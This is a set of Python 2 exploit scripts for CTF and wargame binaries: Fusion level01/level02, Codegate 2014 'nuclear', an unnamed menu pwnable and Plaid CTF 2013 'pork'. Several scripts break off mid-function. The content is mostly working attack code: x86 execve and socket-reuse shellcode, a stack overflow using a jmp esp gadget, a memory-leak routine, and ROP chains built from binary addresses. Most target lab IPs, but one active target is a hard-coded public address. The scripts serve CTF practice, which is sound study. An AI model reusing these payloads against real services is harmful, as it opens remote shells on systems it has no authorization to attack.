# exploit-ex fusion level01 from err0rless import connst, dump from struct import pack s, t = connst("192.168.95.152", 20001) sc = ("\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68" "\x68\x2F\x62\x69\x6E\x89\xE3\x31\xC9\xCD\x80") # $ ./ROPgadget -file /opt/fusion/bin/level01 -g -asm "jmp *%esp" # 0x08049f4f: "\xff\xe4 <==> jmp *%esp" # 0x080483eb: ff d6 call *%esi def pMain(): p = "A" * 139 p += pack("I", 0x08049f4f) # jmp esp p += "\x90\x90\xFF\xD6" # jmp esi opcode s.send("GET " + p + " HTTP/1.1" + sc + "\n") t.interact() if __name__ == "__main__": pMain()
# exploit-ex fusion level02 from err0rless import connst from struct import pack s, t = connst("192.168.95.152", 20002) def leak_keybuf(): s.send("E" + pack("I", 128) + "\x00" * 128) s.recv(1024) key = s.recv(1024)[-128:] return key def cipher(str, key): enc = "" for i in range(len(str)): enc += chr(ord(key[i % 128]) ^ ord(str[i])) return enc def pMain(): xorkey = leak_keybuf() execp = "/bin/sh\x00" # "/bin/sh" execp += pack("I", 0x0804B484) # {"/bin/sh", 0} execp += pack("I", 0x00000000) p = "A" * (32 * 4096 + 0x10)
# Codegate 2014 Junior Pwnable nuclear
"""Codegate 2014 Junior 'nuclear' exploit script (Python 2: `print` statement).

`connst` connects to the hard-coded lab host at import time.  `dump` and
`unpack` are not used in the part of the file in view.  This chunk ends
inside `pMain`.
"""
from err0rless import connst, dump
from struct import pack, unpack

s, t = connst("192.168.95.150", 1129)  # hard-coded lab host and port

# http://shell-storm.org/shellcode/files/shellcode-881.php
# delete `dec %eax`, dup(2) -> dup(4)
# Hand-patched copy of the shell-storm sample, per the two notes above.  The
# identical byte string appears, without this provenance, in the pork script
# of this series.
sc = ("\x6A\x04\x5B\x6A\x29\x58\xCD\x80\x89\xC6"
      "\x31\xC9\x56\x5B\x6A\x3F\x58\xCD\x80\x41\x80"
      "\xF9\x03\x75\xF5\x6A\x0B\x58\x99\x52\x31\xF6"
      "\x56\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E"
      "\x89\xE3\x31\xC9\xCD\x80")

def leakPasscode():
    """Walk the service's prompts and return bytes read back after an over-long input.

    Prints each prompt as it arrives, answers "target", then "0.1/0.1", then
    0x200 'A' bytes.  The result is the reply sliced from offset 0x220-2 up
    to its last two bytes -- a range that starts past the 0x200 bytes just
    sent, so presumably the reply echoes the input buffer together with
    whatever follows it in memory (confirm against the binary; a bounded
    copy with an explicit terminator on that field is the defending fix).
    Relies on each reply arriving in a single recv(1024).
    """
    print t.read_until("> ")
    s.send("target\n")
    print s.recv(1024)
    s.send("0.1/0.1\n")
    print t.read_until("> ")
    s.send("A" * 0x200 + "\n")
    passcode = s.recv(1024)[0x220-2:-2]
    return passcode

def pMain():
    """Entry point: obtain the passcode, then continue (rest not in view)."""
    passcode = leakPasscode()
    print t.read_until("> ")
    # ... remainder of pMain is not in view ...
"""Menu-driven pwnable exploit script (Python 2: `print` statement).

The active target is a hard-coded public address; a lab address is kept as
a commented-out alternative.  `connst` connects at import time.  Every step
assumes one recv(1024) returns a whole prompt.  `unpack` is not used in the
part in view.  This chunk ends inside `pMain`.
"""
from err0rless import connst
from struct import pack, unpack

s, t = connst("61.105.8.2", 11013)  # public address, hard-coded
#s, t = connst("192.168.36.130", 11013)  # lab alternative (commented out)

# ppppr 0x08048F4C

def pMain():
    """Walk menu options 4 -> 1 -> 1, then send address-packed payloads.

    All addresses are 4-byte little-endian values tied to this binary; the
    inline comments are the only record of what each one is.  `p` is built
    twice: the first chain is sent behind 58 filler bytes and one address,
    the second is still being assembled when this chunk ends.
    """
    print t.read_until("Option: ")
    s.send("4\n")
    print s.recv(1024)
    s.send("1\n")
    print s.recv(1024)
    s.send("1\n")

    # First chain: three unannotated addresses.
    p = pack("I", 0x08048882)
    p += pack("I", 0x08048986)
    p += pack("I", 0x0804B1B8)

    print s.recv(1024)
    # 58 filler bytes, one address, then the three words above.  58 is a
    # binary-specific constant with nothing here to derive it.
    s.send("A" * 58 + pack("I", 0x0804B1B4) + p)

    # Second chain (not sent within this chunk).
    p = pack("I", 0x08048540) # write
    # Offset +3 into the ppppr gadget noted above; which pops are skipped
    # needs the disassembly to confirm.
    p += pack("I", 0x08048F4C + 3)
    p += pack("I", 0x0804B010)
    p += pack("I", 0x080484E0) # read
    # ... remainder of pMain is not in view ...
# Plaid CTF 2013 Pwnable pork
"""Plaid CTF 2013 'pork' exploit script (Python 2).

`connst` connects to the hard-coded lab host at import time.  `unpack` and
`sleep` are not used in the part in view.  This chunk ends inside the
`read_gadgets` list literal -- its closing bracket is not in view.
"""
from err0rless import connst
from struct import pack, unpack
from time import sleep

s, t = connst("192.168.95.150", 33227)  # hard-coded lab host and port

# Byte-for-byte the same string as in the nuclear script, which cites its
# shell-storm source and the two edits made to it; that provenance is
# missing here and should be carried over so the bytes can be audited.
sc = ("\x6A\x04\x5B\x6A\x29\x58\xCD\x80\x89\xC6"
      "\x31\xC9\x56\x5B\x6A\x3F\x58\xCD\x80\x41\x80"
      "\xF9\x03\x75\xF5\x6A\x0B\x58\x99\x52\x31\xF6"
      "\x56\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E"
      "\x89\xE3\x31\xC9\xCD\x80")

# Binary-specific addresses, presumably consumed as a chain of return
# addresses later in the file (not in view).  The inline comments are the
# author's only annotation: the first entry is labelled read.plt, and each
# following row of four carries a note on the last value.  Rows 1 and 3 are
# identical; rows 2 and 4 differ only in their first entry (0x8049910 vs
# 0x8049a28) -- the reason for that difference is not recorded.
read_gadgets = [
    0x804ac98, # point read.plt
    0x8049a58, 0x8048b31, 0x8049910, 0x8049990, # bss + 0x50
    0x8049910, 0x8049b70, 0x8049b70, 0x8049b70, # 0x00000004
    0x8049a58, 0x8048b31, 0x8049910, 0x8049990, # bss + 0x50
    0x8049a28, 0x8049b70, 0x8049b70, 0x8049b70
    # ... list continues past the end of this chunk ...